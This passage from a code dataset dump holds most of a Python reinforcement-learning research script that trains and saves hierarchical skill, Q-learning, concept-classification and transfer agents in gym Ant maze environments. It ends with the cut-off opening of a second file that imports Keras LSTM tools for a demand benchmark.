HnS_STdoA.detach().item(),\n HnS_TdoA.detach().item(),\n InSS_TdoA.detach().item(),\n classification_loss.detach().item(),\n model_loss.detach().item()) \n \n def estimate_metrics(self, learning_type):\n metrics = {}\n with torch.no_grad():\n if learning_type == 'sl':\n metrics = self.learn_skills(only_metrics=True)\n elif learning_type == 'ql':\n metrics = self.learn_DQN(only_metrics=True)\n return metrics\n \n def save(self, common_path, specific_path, learning_type):\n self.params['alpha'] = self.alpha\n self.params['init_threshold_entropy_alpha'] = self.threshold_entropy_alpha\n self.params['init_epsilon'] = self.epsilon\n \n pickle.dump(self.params,open(common_path+'/agent_params.p','wb'))\n\n if learning_type in ['sl', 'ql']:\n data_batches = {'l': len(self.memory[learning_type].data)//20000+1}\n for i in range(0, data_batches['l']):\n if i+1 < data_batches['l']:\n pickle.dump(self.memory[learning_type].data[20000*i:20000*(i+1)],open(common_path+'/memory_'+learning_type+str(i+1)+'.p','wb'))\n else:\n pickle.dump(self.memory[learning_type].data[20000*i:-1],open(common_path+'/memory_'+learning_type+str(i+1)+'.p','wb'))\n pickle.dump(data_batches,open(common_path+'/data_batches_'+learning_type+'.p','wb'))\n\n if learning_type in ['sl', 'ql']:\n torch.save(self.critic1[learning_type].state_dict(), specific_path+'_critic1_'+learning_type+'.pt')\n if self.stoA_learning_type == 'DQL':\n torch.save(self.critic2[learning_type].state_dict(), specific_path+'_critic2_'+learning_type+'.pt')\n \n if learning_type == 'sl':\n torch.save(self.v[learning_type].state_dict(), specific_path+'_v_'+learning_type+'.pt')\n torch.save(self.v_target[learning_type].state_dict(), specific_path+'_v_target_'+learning_type+'.pt')\n torch.save(self.actor.state_dict(), specific_path+'_actor_'+learning_type+'.pt')\n\n if learning_type == 'tl':\n torch.save(self.transfer_actor.state_dict(), specific_path+'_transfer_actor_'+learning_type+'.pt')\n torch.save(self.RND.state_dict(), specific_path+'_RDN_'+learning_type+'.pt')\n pickle.dump(self.NAST_MC,open(specific_path+'_NAST_MC_'+learning_type+'.p','wb'))\n pickle.dump(self.QAST_MC,open(specific_path+'_QAST_MC_'+learning_type+'.p','wb'))\n pickle.dump(self.PA_ST_tl,open(specific_path+'_PA_ST_'+learning_type+'.p','wb'))\n\n elif learning_type == 'cl':\n torch.save(self.classifier.state_dict(), specific_path+'_classifier.pt')\n pickle.dump(self.NAST_cl,open(specific_path+'_NAST_'+learning_type+'.p','wb')) \n pickle.dump(self.NnSdoAST_cl,open(specific_path+'_NnSdoAST_'+learning_type+'.p','wb'))\n \n def load(self, common_path, specific_path, learning_type, load_memory=True):\n if learning_type in ['sl', 'ql' ]:\n if load_memory: \n data_batches = pickle.load(open(common_path+'/data_batches_'+learning_type+'.p','rb'))\n pointer = 0\n for i in range(0, data_batches['l']):\n try:\n data = pickle.load(open(common_path+'/memory_'+learning_type+str(i+1)+'.p','rb'))\n self.memory[learning_type].data += data\n pointer += len(data)\n except:\n pass\n self.memory[learning_type].pointer = pointer % self.memory[learning_type].capacity\n self.memory[learning_type].data = self.memory[learning_type].data[-self.memory[learning_type].capacity:]\n\n if learning_type == 'sl': \n self.v[learning_type].load_state_dict(torch.load(specific_path+'_v_'+learning_type+'.pt'))\n self.v_target[learning_type].load_state_dict(torch.load(specific_path+'_v_target_'+learning_type+'.pt'))\n self.v[learning_type].train()\n self.v_target[learning_type].train() \n\n self.actor.load_state_dict(torch.load(specific_path+'_actor_'+learning_type+'.pt'))\n self.actor.train()\n\n if learning_type in ['sl', 'ql']:\n self.critic1[learning_type].load_state_dict(torch.load(specific_path+'_critic1_'+learning_type+'.pt'))\n if self.stoA_learning_type == 'DQL':\n self.critic2[learning_type].load_state_dict(torch.load(specific_path+'_critic2_'+learning_type+'.pt'))\n\n self.critic1[learning_type].train()\n if self.stoA_learning_type == 'DQL':\n self.critic2[learning_type].train() \n\n if learning_type == 'tl':\n self.transfer_actor.load_state_dict(torch.load(specific_path+'_transfer_actor_'+learning_type+'.pt'))\n self.RND.load_state_dict(torch.load(specific_path+'_RDN_'+learning_type+'.pt')) \n self.RND.train()\n\n if learning_type == 'cl':\n self.classifier.load_state_dict(torch.load(specific_path+'_classifier.pt'))\n self.classifier.eval()\n try:\n self.PS_T = pickle.load(open(specific_path+'_PS_T_'+learning_type+'.p','rb'))\n self.PA_ST = pickle.load(open(specific_path+'_PA_ST_'+learning_type+'.p','rb'))\n except:\n pass\n self.NAST_cl = pickle.load(open(specific_path+'_NAST_'+learning_type+'.p','rb')) \n self.NnSdoAST_cl = pickle.load(open(specific_path+'_NnSdoAST_'+learning_type+'.p','rb'))\n \n try:\n self.PnS_STdoA = pickle.load(open(specific_path+'_PnS_STdoA_'+learning_type+'.p','rb'))\n except:\n self.PnS_STdoA = torch.ones(self.n_tasks['ql'], self.n_concepts, self.n_skills+1, self.n_concepts).to(device) / self.n_concepts\n\n def classify(self, T=0, path='', data=None):\n if data is None:\n data = self.memory['ql'].data\n task_data = [i for i in data if int(i[2*self.s_dim+3]) == T]\n task_data = np.array(task_data) \n else:\n task_data = np.array(data)\n data_size = task_data.shape[0]\n \n if data_size > 0:\n s = task_data[:,:self.s_dim]\n s_cuda = torch.FloatTensor(s[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n PS_s = self.classifier(s_cuda)[0]\n numpy_PS_s = PS_s.detach().cpu().numpy()\n S = numpy_PS_s.argmax(1).reshape(-1,1)\n \n x, y, q = s[:,0].reshape(-1,1), s[:,1].reshape(-1,1), s[:,3:7]\n cos_half_theta = 1-2*(q[:,2]**2+q[:,3]**2)\n sin_half_theta = 2*(q[:,0]*q[:,3] + q[:,1]*q[:,2])\n theta = np.arctan2(sin_half_theta, cos_half_theta).reshape(-1,1)\n\n angles = np.linspace(-np.pi, np.pi, 9)\n deltas = theta - angles.reshape(1,-1)\n group_id = (np.abs(deltas) <= np.pi/8).argmax(1).reshape(-1,1)\n group_id = np.array([group_id[i] if group_id[i] != 8 else 0 for i in range(0, data_size)])\n export_data = np.concatenate((x, y, theta, S, group_id.reshape(-1,1), numpy_PS_s), axis=1)\n np.savetxt(path + 'classified_samples_'+str(T)+'.txt', export_data)\n print(\"Samples classified\")\n \n def restart_policies(self): \n self.critic1['ql'] = discrete_AC(self.n_skills+1, self.dims['last_ext']-self.dims['init_ext'], self.n_tasks['ql'], lr=self.lr).to(device)\n\nclass System:\n def __init__(self, params, agent_params={}, skill_learning=True):\n \n self.params = params\n default_params = {\n 'seed': 1000,\n 'joint_learning': False,\n 'joint_cycles': 200,\n 'env_names_sl': [],\n 'env_names_ql': [],\n 'env_names_tl': [],\n 'env_steps_sl': 1,\n 'env_steps_ql': 5,\n 'env_steps_tl': 5, \n 'grad_steps': 1, \n 'init_steps': 10000,\n 'max_episode_steps': 1000,\n 'tr_steps_sl': 1000,\n 'tr_steps_ql': 600,\n 'tr_epsd_sl': 4000,\n 'tr_epsd_ql': 6000,\n 'tr_epsd_wu': 40,\n 'tr_epsd_tl': 100,\n 'tr_steps_cl': 100000,\n 'tr_steps_tl': 100,\n 'eval_epsd_sl': 10,\n 'eval_epsd_interval': 20,\n 'eval_epsd_ql': 5,\n 'eval_epsd_tl': 5,\n 'eval_steps_sl': 1000,\n 'eval_steps_ql': 600,\n 'eval_steps_tl': 1800,\n 'batch_size': 256, \n 'render': True, \n 'reset_when_done': True, \n 'store_video': False,\n 'storing_path': '',\n 'MT_steps': 200,\n 'update_steps_tl': 4,\n 'active_RND': True,\n 'masked_done': True,\n 'active_MC': True \n }\n\n for key, value in default_params.items():\n if key not in self.params.keys():\n self.params[key] = value\n\n self.seed = self.params['seed']\n set_seed(self.seed)\n self.np_random, _ = seeding.np_random(self.seed)\n self.env_names = {\n 'sl': self.params['env_names_sl'],\n 'ql': self.params['env_names_ql'],\n 'cl': self.params['env_names_ql'],\n 'tl': self.params['env_names_tl']\n }\n self.n_tasks = {\n 'sl': len(self.env_names['sl']),\n 'ql': len(self.env_names['ql']),\n 'cl': len(self.env_names['ql']),\n 'tl': len(self.env_names['tl'])\n }\n self.steps = {\n 'env': {\n 'sl': self.params['env_steps_sl'],\n 'ql': self.params['env_steps_ql'],\n 'tl': self.params['env_steps_tl']\n },\n 'grad': self.params['grad_steps'],\n 'init': self.params['init_steps'],\n 'tr': {\n 'sl': self.params['tr_steps_sl'],\n 'ql': self.params['tr_steps_ql'],\n 'cl': self.params['tr_steps_cl'],\n 'tl': self.params['tr_steps_tl']\n },\n 'MT': self.params['MT_steps'],\n 'update': {\n 'tl': self.params['update_steps_tl']\n },\n 'eval': {\n 'sl': self.params['eval_steps_sl'],\n 'ql': self.params['eval_steps_ql'],\n 'tl': self.params['eval_steps_tl']\n }\n }\n self.epsds = {\n 'tr': {\n 'sl': self.params['tr_epsd_sl'],\n 'ql': self.params['tr_epsd_ql'],\n 'tl': self.params['tr_epsd_tl'],\n 'wu': self.params['tr_epsd_wu']\n },\n 'eval': {\n 'sl': self.params['eval_epsd_sl'],\n 'ql': self.params['eval_epsd_ql'],\n 'tl': self.params['eval_epsd_tl'],\n 'interval': self.params['eval_epsd_interval']\n },\n }\n self.joint_cycles = self.params['joint_cycles']\n \n self.batch_size = self.params['batch_size']\n self.render = self.params['render']\n self.store_video = self.params['store_video']\n self.reset_when_done = self.params['reset_when_done']\n self._max_episode_steps = self.params['max_episode_steps']\n \n self.envs = {}\n self.joint = self.params['joint_learning']\n self.active_RND = self.params['active_RND']\n self.active_MC = self.params['active_MC']\n self.masked_done = self.params['masked_done']\n self.learning_type = 'sl' if not self.joint else 'ql' # if skill_learning else 'ql'\n\n self.set_envs()\n\n self.s_dim = self.envs[self.learning_type][0].observation_space.shape[0]\n self.a_dim = self.envs[self.learning_type][0].action_space.shape[0] \n self.sa_dim = self.s_dim + self.a_dim\n self.sars_dim = self.s_dim*2 + self.a_dim + 1\n self.sarsd_dim = self.sars_dim + 1\n self.t_dim = self.sarsd_dim + 1\n self.epsd_counter = 0\n self.task = 0\n self.MT_task = 0\n\n self.min_action = self.envs[self.learning_type][0].action_space.low[0]\n self.max_action = self.envs[self.learning_type][0].action_space.high[0]\n\n n_tasks = self.n_tasks.copy()\n self.multitask_envs = {\n 'sl': False,\n 'ql': False, # TODO\n 'tl': False,\n } \n self.check_multitask(n_tasks)\n agent_params['joint_learning'] = self.joint\n self.agent = Agent(self.s_dim, self.a_dim, n_tasks, agent_params, seed=self.seed) \n\n def check_multitask(self, n_tasks):\n if self.n_tasks[self.learning_type] == 1:\n try:\n n = self.envs[self.learning_type][0]._n_tasks\n n_tasks[self.learning_type] = n\n self.multitask_envs[self.learning_type] = True\n self.n_MT_tasks = n\n except:\n pass \n\n def set_envs(self):\n self.envs[self.learning_type] = [] \n for i in range(0, self.n_tasks[self.learning_type]): \n self.envs[self.learning_type].append(gym.make(self.env_names[self.learning_type][i]).unwrapped)\n print(\"Created env \"+self.env_names[self.learning_type][i])\n self.envs[self.learning_type][i].reset()\n self.envs[self.learning_type][i].seed(self.seed) \n self.envs[self.learning_type][i]._max_episode_steps = self._max_episode_steps\n self.envs[self.learning_type][i].rgb_rendering_tracking = True\n \n def reset(self, change_env=False):\n if change_env: self.task = (self.task+1) % self.n_tasks[self.learning_type]\n self.envs[self.learning_type][self.task].reset() \n \n def get_obs(self):\n state = self.envs[self.learning_type][self.task]._get_obs().copy()\n return state\n \n def initialization(self, init_steps=0): \n self.reset()\n skill = 0\n if init_steps == 0: init_steps = self.steps['init']\n for init_step in range(0, init_steps * self.n_tasks[self.learning_type]):\n if self.multitask_envs[self.learning_type]:\n if (init_step % self.steps['env'][self.learning_type]) == 0 and np.random.rand()>0.95:\n skill = np.random.randint(self.agent.n_skills)\n else:\n skill = self.task\n done = self.interaction_init(skill)\n limit_reached = (init_step+1) % init_steps == 0\n if done or limit_reached: self.reset(change_env=limit_reached)\n if self.render: self.envs[self.learning_type][self.task].render() \n print(\"Finished initialization...\")\n\n def interaction_init(self, skill): \n event = np.empty(self.t_dim)\n state = self.get_obs()\n action = 2.0*np.random.rand(self.a_dim)-1.0 \n next_state, reward, done, info = self.envs[self.learning_type][self.task].step(action) \n done = done and self.reset_when_done\n if self.multitask_envs[self.learning_type] and self.learning_type == 'sl':\n skill_reward = info['reward_'+str(skill)]\n reward += skill_reward\n \n if self.multitask_envs[self.learning_type] and self.learning_type == 'ql':\n skill_reward = info['reward_'+str(self.MT_task)]\n reward += skill_reward\n\n event[:self.s_dim] = state\n event[self.s_dim:self.sa_dim] = action\n event[self.sa_dim] = reward\n event[self.sa_dim+1:self.sars_dim] = next_state\n event[self.sars_dim] = float(done)\n event[self.sarsd_dim] = skill\n \n self.agent.memorize(event, 'sl') \n return done\n\n def interaction(self, remember=True, explore=True, learn=True, lim=0, previous_skill = 0, joint_warmup=False): \n event = np.empty(self.t_dim)\n initial_state = self.get_obs()\n state = initial_state.copy()\n final_state = initial_state.copy()\n total_reward = 0.0\n done = end_step = False\n max_env_step = self.steps['env'][self.learning_type]\n \n task = self.MT_task if self.multitask_envs[self.learning_type] else self.task\n\n try:\n self.envs[self.learning_type][self.task]._update_quaternion()\n except:\n pass\n\n if self.learning_type == 'sl':\n if self.multitask_envs[self.learning_type]:\n if np.random.rand() > 0.95:\n skill = np.random.randint(self.agent.n_skills)\n else:\n skill = previous_skill\n else:\n skill = task\n elif self.learning_type == 'ql': \n skill = self.agent.decide(state, task, self.learning_type, explore=explore)\n elif self.learning_type == 'tl':\n if remember:\n skill = self.agent.decide(state, task, self.learning_type, explore=explore) # TODO\n else:\n skill = self.agent.decide(state, task, self.learning_type, explore=explore, rng=self.np_random) \n s_cuda = torch.FloatTensor(state[self.agent.dims['init_ext']:self.agent.dims['last_ext']]).to(device).view(1,-1)\n with torch.no_grad():\n concept = self.agent.classifier(s_cuda)[0].argmax().item()\n \n if self.env_names[self.learning_type][self.task] == 'AntCrossMaze-v3':\n self.envs[self.learning_type][self.task]._update_led_visualization(concept, skill)\n \n for env_step in itertools.count(0):\n action = self.agent.act(state, skill, explore=explore if (self.learning_type == 'sl' or self.joint and self.learning_type=='ql') else False)\n scaled_action = scale_action(action, self.min_action, self.max_action).reshape(-1)\n next_state, reward, done, info = self.envs[self.learning_type][self.task].step(scaled_action)\n if self.multitask_envs[self.learning_type] and self.learning_type == 'sl':\n skill_reward = info['reward_'+str(skill)]\n reward += skill_reward\n if self.multitask_envs[self.learning_type] and self.learning_type == 'ql':\n try:\n task_reward = info['reward_'+str(self.MT_task)]\n reward += task_reward\n except:\n pass\n end_step = end_step or (done and self.reset_when_done)\n total_reward += reward \n final_state = np.copy(next_state)\n\n event[:self.s_dim] = state\n event[self.s_dim:self.sa_dim] = action\n event[self.sa_dim] = reward\n event[self.sa_dim+1:self.sars_dim] = next_state\n event[self.sars_dim] = float(done)\n if not self.joint: # TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO\n event[self.sarsd_dim] = skill\n else:\n event[self.sarsd_dim] = task\n \n if remember and (self.learning_type == 'sl' or (self.learning_type == 'ql' and self.joint and not joint_warmup and skill < self.agent.n_skills)): self.agent.memorize(event.copy(), 'sl')\n if env_step < self.steps['env'][self.learning_type]-1: state = np.copy(next_state)\n if end_step or (env_step+1) >= max_env_step: break \n if self.render and ((env_step+1)%10) == 0: self.envs[self.learning_type][self.task].render()\n if learn and self.learning_type == 'ql' and self.joint and not joint_warmup: self.agent.learn_skills()\n \n if self.learning_type in ['ql', 'tl']:\n masked_done = float(done) if not self.masked_done else float(end_step)\n event = np.empty(2*self.s_dim+4) if self.learning_type == 'ql' else np.empty(2*self.s_dim+5) \n event[:self.s_dim] = initial_state \n event[self.s_dim] = skill\n event[self.s_dim+1] = total_reward\n event[self.s_dim+2:2*self.s_dim+2] = final_state\n event[2*self.s_dim+2] = masked_done\n event[2*self.s_dim+3] = task\n if self.learning_type == 'tl': event[2*self.s_dim+4] = concept\n if remember:\n if (self.learning_type == 'ql' and (not self.joint or self.agent.stoA_learning_type == 'SAC')) or self.learning_type == 'tl': self.agent.memorize(event.copy(), self.learning_type)\n\n if learn:\n if self.learning_type == 'sl':\n for _ in range(0, self.steps['grad']):\n self.agent.learn_skills()\n elif self.learning_type == 'ql':\n for _ in range(0, self.steps['grad']):\n if not self.joint or self.agent.stoA_learning_type == 'SAC':\n self.agent.learn_DQN() \n elif self.learning_type == 'tl':\n for _ in range(0, self.steps['grad']):\n self.agent.learn_transfer_policy(self.learning_type) \n\n return total_reward, done, event, env_step+1, skill \n\n def train_agent(self, initialization=True, skill_learning=True, storing_path='', rewards=[], metrics=[], losses=[], entropies=[], entropies_2=[], \n iter_0=0, q_learning=True, concept_learning=True, transfer_learning=True):\n if len(storing_path) == 0: storing_path = self.params['storing_path']\n\n if initialization:\n self.initialization()\n specific_path = storing_path + '/' + str(0)\n self.save(storing_path, specific_path)\n \n init_iter = iter_0\n if skill_learning and not self.joint:\n self.train_agent_skills(storing_path=storing_path, rewards=rewards, metrics=metrics, iter_0=init_iter)\n init_iter = 0\n \n if q_learning:\n self.agent.memory['sl'].forget()\n if not self.joint:\n self.learning_type = 'ql' \n self.set_envs()\n self.train_agent_skills(storing_path=storing_path, iter_0=init_iter) \n else:\n for i in range(0, self.joint_cycles):\n self.agent.restart_policies()\n self.train_agent_skills(storing_path=storing_path, iter_0=0, joint_warmup=True) \n self.train_agent_skills(storing_path=storing_path, iter_0=init_iter)\n init_iter += self.epsds['tr'][self.learning_type] // self.epsds['eval']['interval']\n init_iter = 0\n\n self.learning_type = 'cl'\n if concept_learning:\n self.train_agent_concepts(storing_path=storing_path, iter_0=init_iter, losses=losses, entropies=entropies, entropies_2=entropies_2)\n init_iter = 0\n \n if transfer_learning:\n self.agent.memory['ql'].forget()\n self.learning_type = 'tl'\n self.set_envs()\n self.agent.classifier.eval()\n self.train_agent_skills(storing_path=storing_path, iter_0=init_iter)\n \n @property\n def keep_track(self):\n return (self.active_RND and self.learning_type == 'tl') or (self.active_MC and self.learning_type == 'tl')\n\n def train_agent_skills(self, iter_0=0, rewards=[], metrics=[], lengths=[], storing_path='', joint_warmup=False): \n if self.render: self.envs[self.learning_type][self.task].render() \n \n lim_epsd = self.epsds['tr'][self.learning_type] if not joint_warmup else self.epsds['tr']['wu']\n for epsd in range(0, lim_epsd):\n change_env = False if epsd == 0 else True\n self.reset(change_env=change_env)\n iter_ = iter_0 + (epsd+1) // self.epsds['eval']['interval']\n step_counter = 0\n previous_skill = self.task\n if self.keep_track: \n trajectory = []\n if self.active_MC: trajectory_MC = []\n \n for epsd_step in itertools.count(0):\n learn = epsd != 0 or epsd_step+1 > 3*self.batch_size or self.joint\n if self.learning_type == 'tl':\n learn = learn and ((step_counter + 1) % self.steps['update']['tl']) == 0\n done, event, env_steps, previous_skill = self.interaction(learn=learn, lim=self.steps['tr'][self.learning_type]-step_counter, previous_skill=previous_skill, joint_warmup=joint_warmup)[1:]\n\n if self.render: self.envs[self.learning_type][self.task].render()\n if self.keep_track: trajectory.append(event.copy())\n if self.keep_track and self.active_MC: \n S, A, R = event[2*self.s_dim+4], event[self.s_dim], event[self.s_dim+1]\n trajectory_MC.append([S,A,R])\n\n if done: \n self.reset(change_env=False)\n if self.keep_track:\n if self.active_MC:\n self.agent.MC_learning(trajectory_MC)\n trajectory_MC = [] \n step_counter += env_steps\n\n if (epsd_step + 1) % (512) == 0 and self.agent.active_intrinsic_learning: # TODO: add 512 to param dict.\n self.agent.intrinsic_learning(trajectory)\n trajectory = []\n\n if step_counter >= self.steps['tr'][self.learning_type] * self.steps['env'][self.learning_type]: \n if self.keep_track: \n if len(trajectory) >= 1:\n if self.active_RND and self.agent.active_intrinsic_learning:\n self.agent.intrinsic_learning(trajectory)\n trajectory = []\n if self.active_MC:\n self.agent.MC_learning(trajectory_MC)\n trajectory_MC = []\n break\n \n if self.multitask_envs[self.learning_type] and ((step_counter+1) % self.steps['MT']) == 0: \n self.MT_task = (self.MT_task + np.random.randint(self.n_MT_tasks-1) + 1) % self.n_MT_tasks \n \n if (epsd+1) % self.epsds['eval']['interval'] == 0 and not joint_warmup:\n st0_random = random.getstate()\n st0 = np.random.get_state() \n st0_rng = self.np_random.get_state()\n st0_torch = torch.get_rng_state() \n if device == \"cuda\": st0_torch_cuda = torch.cuda.get_rng_state() \n st_envs = []\n for env in self.envs[self.learning_type]:\n st_envs.append(env.np_random.get_state())\n \n r, _, m, l = self.eval_agent_skills(explore=(self.learning_type=='sl'), iter_=iter_, store_events=False)\n random.setstate(st0_random)\n np.random.set_state(st0)\n self.np_random.set_state(st0_rng)\n torch.set_rng_state(st0_torch)\n if device == \"cuda\": torch.cuda.set_rng_state(st0_torch_cuda)\n for i, env in enumerate(self.envs[self.learning_type]):\n env.np_random.set_state(st_envs[i])\n\n metrics.append(m)\n rewards += r\n if self.learning_type == 'tl': \n lengths.append(l)\n np.savetxt(storing_path + '/lengths_'+self.learning_type+'.txt', np.array(lengths))\n np.savetxt(storing_path + '/metrics_'+self.learning_type+'.txt', np.array(metrics)) \n \n specific_path = storing_path + '/' + str(iter_)\n self.save(storing_path, specific_path=specific_path)\n np.savetxt(storing_path + '/mean_rewards_'+self.learning_type+'.txt', np.array(rewards))\n \n def train_agent_concepts(self, losses=[], entropies=[], entropies_2=[], storing_path='', iter_0=0, min_lr=1e-4, max_lr=3e-4, T=50000, max_tau=5.0, min_tau=1.3, last_steps=50000, max_max_tau=10.0):\n stdscr = curses.initscr()\n curses.noecho()\n curses.cbreak() \n\n for grad_step in range(0, self.steps['tr'][self.learning_type]):\n classifier_loss, HS_T, HS_s, ISs_T, ILBO_AS_T_term1, HA_T, ILBO_AS_T, ILBO_nSS_TdoA_term1, HnS_TdoA, ILBO_nSS_TdoA, cl, ml = self.agent.learn_concepts()\n losses.append([classifier_loss, cl, ml])\n entropies.append([HS_T, HS_s, ISs_T, ILBO_AS_T_term1, HA_T, ILBO_AS_T, ILBO_nSS_TdoA_term1, HnS_TdoA, ILBO_nSS_TdoA])\n\n stdscr.addstr(0, 0, \"Iteration: {}\".format(grad_step))\n stdscr.addstr(1, 0, \"Classifier Loss: {}\".format(np.round(classifier_loss, 4)))\n stdscr.addstr(2, 0, \"Entropy H(S|T): {}\".format(np.round(HS_T, 4)))\n stdscr.addstr(3, 0, \"Entropy H(S|s): {}\".format(np.round(HS_s,4)))\n stdscr.addstr(4, 0, \"MutualInfo I(S:s|T): {}\".format(np.round(ISs_T,4)))\n stdscr.addstr(5, 0, \"Entropy H(A|S,T): {}\".format(np.round(ILBO_AS_T_term1,4)))\n stdscr.addstr(6, 0, \"Entropy H(A|T): {}\".format(np.round(HA_T,4)))\n stdscr.addstr(7, 0, \"MutualInfo I(A:S|T): {}\".format(np.round(ILBO_AS_T,4)))\n stdscr.addstr(8, 0, \"Entropy H(S'|S,T,do(A)) : {}\".format(np.round(ILBO_nSS_TdoA_term1,4)))\n stdscr.addstr(9, 0, \"Entropy H(S'|T,do(A)): {}\".format(np.round(HnS_TdoA,4)))\n stdscr.addstr(10, 0, \"MutualInfo I(S':S|T,do(A)): {}\".format(np.round(ILBO_nSS_TdoA,4)))\n stdscr.addstr(11, 0, \"Policy model loss: {}\".format(np.round(cl, 4)))\n stdscr.addstr(12, 0, \"Transition model loss: {}\".format(np.round(ml, 4)))\n stdscr.refresh()\n\n if (grad_step + 1) % 5000 == 0:\n self.save(storing_path, storing_path+ '/' + str(iter_0+grad_step+1))\n np.savetxt(storing_path + '/concept_training_losses.txt', np.array(losses))\n np.savetxt(storing_path + '/concept_training_entropies.txt', np.array(entropies)) \n \n curses.echo()\n curses.nocbreak()\n curses.endwin() \n\n @property\n def entropy_metric(self):\n return self.learning_type == 'sl' or self.agent.stoA_learning_type == 'SAC'\n\n def eval_agent_skills(self, eval_epsds=0, explore=False, iter_=0, start_render=False, print_space=True, specific_path='video', max_step=0, task=None, store_events=True):\n if task is None: \n task = self.task\n self.task = 0\n given_task = False\n if self.multitask_envs[self.learning_type]:\n MT_task = self.MT_task\n self.MT_task = 0\n else:\n self.task = task\n given_task = True\n self.reset()\n\n if start_render: self.envs[self.learning_type][self.task].render()\n if eval_epsds == 0: \n if self.multitask_envs[self.learning_type]:\n eval_epsds = self.epsds['eval'][self.learning_type] * self.n_MT_tasks\n else:\n eval_epsds = self.epsds['eval'][self.learning_type] * self.n_tasks[self.learning_type]\n \n events = []\n rewards = []\n epsd_lengths = []\n min_epsd_reward = 1.0e6\n max_epsd_reward = -1.0e6\n\n if self.entropy_metric:\n Ha_sT = []\n Ha_sT_average = 0.0\n entropy = 'H(a|s,T)' if self.learning_type == 'sl' else 'H(A|s,T)'\n \n if max_step <= 0: max_step = self.steps['eval'][self.learning_type]\n\n for epsd in range(0, eval_epsds):\n step_counter = 0\n\n if self.store_video: video = VideoWriter(specific_path + '_' + str(self.task) + '_' + str(epsd) + '_' + self.learning_type + '.avi', fourcc, float(FPS), (width, height))\n\n change_env = False if epsd == 0 or given_task else True\n self.reset(change_env=change_env) \n epsd_reward = 0.0\n previous_skill = self.task\n\n for eval_step in itertools.count(0): \n reward, done, event, env_steps, previous_skill = self.interaction(remember=False, explore=explore, learn=False, lim=self.steps['tr'][self.learning_type]-step_counter, previous_skill=previous_skill)\n if self.learning_type == 'sl':\n event[self.sa_dim] = reward \n epsd_reward += reward \n if self.learning_type == 'tl':\n step_counter += env_steps \n\n if self.store_video:\n img = self.envs[self.learning_type][self.task].render('rgb_array',1024,768)\n video.write(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n elif self.render:\n self.envs[self.learning_type][self.task].render()\n\n if store_events:\n if self.env_names[self.learning_type][self.task] == 'AntCrossMaze-v3':\n goal_position = np.copy(self.envs[self.learning_type][self.task]._goal_position[:2])\n event = np.concatenate([event, goal_position])\n if self.env_names[self.learning_type][self.task] in ['AntGather-v3', 'AntAvoid-v3']:\n object_positions = np.copy(self.envs[self.learning_type][self.task]._object_positions[:,:2].reshape(-1))\n event = np.concatenate([event, object_positions])\n events.append(event)\n\n if done or ((eval_step + 1) >= max_step):\n if self.learning_type != 'tl':\n epsd_lengths.append(eval_step + 1)\n else:\n epsd_lengths.append(step_counter)\n break\n\n metrics = self.agent.estimate_metrics(self.learning_type)\n if self.entropy_metric: \n Ha_sT.append(metrics[entropy])\n Ha_sT_average += (Ha_sT[-1] - Ha_sT_average)/(epsd+1)\n\n rewards.append(epsd_reward)\n min_epsd_reward = np.min([epsd_reward, min_epsd_reward])\n max_epsd_reward = np.max([epsd_reward, max_epsd_reward])\n average_reward = np.array(rewards).mean()\n \n if self.entropy_metric: \n stdout.write(\"Iter %i, epsd %i, %s: %.4f, min r: %i, max r: %i, mean r: %i, epsd r: %i\\r \" %\n (iter_, (epsd+1), entropy, Ha_sT_average, min_epsd_reward//1, max_epsd_reward//1, average_reward//1, epsd_reward//1))\n else:\n stdout.write(\"Iter %i, epsd %i, min r: %.3f, max r: %.3f, mean r: %.3f, epsd r: %.3f\\r \" %\n (iter_, (epsd+1), min_epsd_reward, max_epsd_reward, average_reward, epsd_reward))\n stdout.flush() \n\n self.MT_task = (self.MT_task + 1) % self.n_MT_tasks\n # self.MT_task = (self.MT_task + np.random.randint(self.n_MT_tasks-1) + 1) % self.n_MT_tasks \n\n if print_space: print(\"\")\n\n if self.store_video: video.release()\n metric_vector = np.array([Ha_sT_average]) if self.entropy_metric else np.array([]) \n \n if not given_task: \n self.task = task\n if self.multitask_envs[self.learning_type]:\n self.MT_task = MT_task\n return rewards, np.array(events), metric_vector, np.array(epsd_lengths) \n \n def save(self, common_path, specific_path=''):\n self.params['learning_type'] = self.learning_type\n pickle.dump(self.params, open(common_path+'/params.p','wb'))\n self.agent.save(common_path, specific_path, self.learning_type)\n if self.joint: self.agent.save(common_path, specific_path, 'sl')\n \n def load(self, common_path, iter_0_sl=0, iter_0_sl_2=0, iter_0_ql=0, iter_0_cl=0, iter_0_tl=0, load_memory=True): # TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO\n if not self.joint:\n if iter_0_sl > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_sl), 'sl', load_memory=(load_memory and iter_0_ql==0))\n if iter_0_sl_2 > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_sl_2), 'sl_2', load_memory=False)\n if iter_0_ql > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_ql), 'ql', load_memory=(load_memory and iter_0_tl==0))\n if iter_0_cl > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_cl), 'cl')\n if iter_0_tl > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_tl), 'tl', load_memory=load_memory)\n else:\n if iter_0_ql > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_ql), 'sl', load_memory=load_memory)\n self.agent.load(common_path, common_path + '/' + str(iter_0_ql), 'ql', load_memory=False)\n\n \n\n","sub_path":"CL.py","file_name":"CL.py","file_ext":"py","file_size_in_byte":76973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"33424434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 21 15:42:29 2021\n\n@author: jmwu\n\"\"\"\n\n\nimport numpy as np\nfrom RL_brain import QLearningTable\nimport warnings\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom keras.callbacks import EarlyStopping\nimport keras.backend as K\nimport keras.initializers as KI\nimport tensorflow as tf\nfrom keras import regularizers\nwarnings.filterwarnings(\"ignore\")\n\nclass BenchmarkInAccurateDemand:\n def __init__(self, Capacity,Window, Ntrain,Ntest,Nvalid, Price,Demand, 